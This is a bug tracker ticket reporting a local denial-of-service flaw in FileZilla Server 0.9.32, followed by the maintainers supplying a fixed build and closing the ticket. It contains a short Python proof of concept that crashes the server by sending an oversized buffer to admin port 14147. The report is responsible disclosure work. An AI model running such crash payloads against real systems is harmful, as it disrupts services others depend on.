Opened 10 years ago

Closed 7 years ago

#4693 closed Bug report (fixed)

FileZilla Server version 0.9.32 local denial of service

Reported by: Juan Pablo Lopez Yacubian
Owned by:
Priority: critical
Component: FileZilla Server
Keywords: crash, admin, 14147, fixed
Cc:
Component version:
Operating system type: Windows
Operating system version: XP SP3

Description

Hello people

The problem is in a local port (14147) that "FileZilla Server" uses for its interface.

If you send some data to this port, which is open in "FileZilla Server Interface.exe", the process "FileZilla server.exe" crashes.

I did some tests with a debugger and I could not run code. For me it is only a denial of service, but it is important to repair it because this process runs with system privileges.

I wrote a PoC in Python for testing:

from socket import *

host = "127.0.0.1"
port = 14147

data = "A" * 698000

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(data)
s.close()

OS: Windows XP SP3 - all patches

see you


Juan Pablo Lopez Yacubian

Attachments (1)

FileZilla Server.7z (242.5 KB) - added by Tim Kosse 10 years ago.

Change History (3)

Changed 10 years ago by Tim Kosse

Attachment: FileZilla Server.7z added

comment:1 Changed 10 years ago by Tim Kosse

Priority: low → critical
Status: new → moreinfo

Thanks for spotting this.

Please try the attached build of FileZilla Server.

comment:2 Changed 7 years ago by Josh Davis

Keywords: crash admin 14147 fixed added
Resolution: fixed
Status: moreinfo → closed

This is 3 years old, and a fix was released.
If this problem still occurs on current FzServer, please reopen this ticket.
